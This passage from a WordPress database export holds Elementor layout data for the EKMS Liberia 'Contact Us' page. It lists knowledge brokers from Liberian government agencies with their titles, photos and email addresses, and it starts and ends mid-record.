Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23379,3397,'_elementor_edit_mode','builder'),(23380,3397,'_elementor_template_type','wp-page'),(23381,3397,'_elementor_version','3.0.16'),(23382,3397,'_wp_page_template','default'),(23383,3397,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong>\\n<p>Manager, ESIA <\\/br>\\nDepartment of Compliance and Enforcement <\\/br>\\nEPA\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong>\\n<p>EIA Manager <\\/br>FDA <\\/br>\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong>\\n<p>Marketing and Forest Forecast \\n<\\/br>\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><\\/p><p>Director, MOA<\\/p><p><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager, LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>NaFAA<br \\/>Monitoring, Control, and Surveillance Field Officer <\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>NaFAA<br \\/>Small Scale Fisheries 